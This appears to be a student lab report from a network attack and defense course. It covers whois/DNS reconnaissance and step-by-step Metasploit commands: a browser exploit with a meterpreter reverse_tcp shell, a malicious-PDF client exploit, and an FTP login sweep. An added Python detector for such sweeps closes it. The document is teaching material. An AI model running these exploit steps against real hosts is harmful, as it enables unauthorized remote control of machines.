20155235 "Network Attack and Defense" Experiment 6 Information Collection and Vulnerability Scanning


Experimental content

  1. Application of various search techniques

  2. Query of DNS IP registration information

  3. Basic scanning techniques: host discovery, port scanning, OS and service version detection, enumeration of specific services

  4. Vulnerability Scanning: Can scan, read reports, check vulnerability descriptions, and patch vulnerabilities

    Experiment 1. Application of various search techniques

    whois

  • Use the whois command to query information
    The result is shown in the figure



nslookup

  • Use dig -h to get help



  • DNS server query results and cached results of other websites


  • Use the shodan search engine to query, get:
  • IP reverse domain name query, get:
  • IP2Location to query, get:

    tracert route detection

  • Windows case:
  • Linux situation:


    wonderful difference, emmn...
  • Baidu's address

Experiment 2 Attacks on Browsers

  • Enter msfconsole in the Kali terminal to enter the console
  • Enter use exploit/windows/browser/ms10_046_shortcut_icon_dllloader to select the browser exploit
  • Enter set payload windows/meterpreter/reverse_tcp, select the reverse-connection payload
  • Enter set SRVHOST 192.168.129.133, set the server host IP
  • Enter set LHOST 192.168.129.133, set the IP of the attacking machine
  • Enter exploit, get http://192.168.129.133:80/
  • Access http://192.168.129.133:80/ on the target machine, a window will pop up
  • At the same time, the attacker's computer gets the connection; enter sessions to view the computer that connected back to the host.
  • Enter sessions -i 2 to control the target

    Experiment 3 Attacks on Clients

  • Enter exploit/windows/fileformat/adobe_cooltype_sing, determine the attack plan
  • Enter set LHOST 192.168.129.133, set the IP of the attacking machine
  • Enter set LPORT 5235, set the attack port
  • Transfer the generated pdf to the target machine to open, and start listening on kali at the same time

    Experiment 4 applies an auxiliary module

  • Enter show auxiliary to view all auxiliary modules
  • Use scanner/http/dir_scanner to scan directories
  • Select ftp_login, scan the five hosts 192.168.3.44 to 192.168.43.48, use the user name 20151124 (I randomly typed it), and the password is 123456.



    Experiment results: Miscalculation! Actually not!
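    The ftp_login run above tries one user name and password against several hosts, so each FTP server logs only a single failed login and a per-server threshold never fires. The following is an added example, not part of the original experiment: it correlates failures across servers to flag that kind of sweep. The vsftpd-style log format, the addresses and the user names are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample data (not from the experiment): one vsftpd-style log
# excerpt per FTP server, keyed by the server's address.
LOGS = {
    "10.0.0.44": 'Tue Apr 10 14:02:01 2018 [pid 3101] [labuser] FAIL LOGIN: Client "198.51.100.7"\n',
    "10.0.0.45": 'Tue Apr 10 14:02:02 2018 [pid 2210] [labuser] FAIL LOGIN: Client "198.51.100.7"\n'
                 'Tue Apr 10 14:05:40 2018 [pid 2215] [alice] FAIL LOGIN: Client "192.0.2.20"\n'
                 'Tue Apr 10 14:05:52 2018 [pid 2215] [alice] OK LOGIN: Client "192.0.2.20"\n',
    "10.0.0.46": 'Tue Apr 10 14:02:02 2018 [pid 1877] [labuser] FAIL LOGIN: Client "198.51.100.7"\n',
    "10.0.0.47": 'Tue Apr 10 14:02:03 2018 [pid 4012] [labuser] FAIL LOGIN: Client "198.51.100.7"\n',
    "10.0.0.48": 'Tue Apr 10 14:02:04 2018 [pid 2950] [labuser] FAIL LOGIN: Client "198.51.100.7"\n',
}

LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} [ \d]\d \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'\[[^\]]*\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"')

def failed_logins(logs):
    """Yield (timestamp, client_ip, server) for every FAIL LOGIN line."""
    for server, text in logs.items():
        for line in text.splitlines():
            m = LINE_RE.match(line)
            if m and m["result"] == "FAIL":
                ts = datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y")
                yield ts, m["ip"], server

def find_sweeps(logs, min_servers=3, window=timedelta(minutes=5)):
    """Return {client_ip: [servers]} for clients that failed to log in on at
    least min_servers distinct servers within one time window."""
    by_client = defaultdict(list)
    for ts, ip, server in sorted(failed_logins(logs)):
        by_client[ip].append((ts, server))
    flagged = {}
    for ip, events in by_client.items():
        for i, (start, _) in enumerate(events):
            hit = {srv for ts, srv in events[i:] if ts - start <= window}
            if len(hit) >= min_servers:
                flagged[ip] = sorted(hit)
                break
    return flagged

if __name__ == "__main__":
    for ip, servers in find_sweeps(LOGS).items():
        print(f"{ip} failed FTP logins on {len(servers)} servers: {servers}")
```

    The client that mistyped a password once on one server (192.0.2.20 in the sample) stays below the default threshold, while the client that touched all five servers within seconds is reported.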

    question

  1. Explain in your own words what is exploit, payload, encode.
    Exploit is to use, find the loophole and use it!
    The payload is a carrier that allows us to put the virus in and transmit it to other people's computers.
    Encode encryption, in order to prevent our virus from being detected. The encryption method

Experimental experience

From the fourth test, I had an idea of installing a memory stick. By this experiment, the idea finally took root. I want to install an 8G memory stick!!!!! Otherwise, the virtual machine can't be opened, isn't it funny!
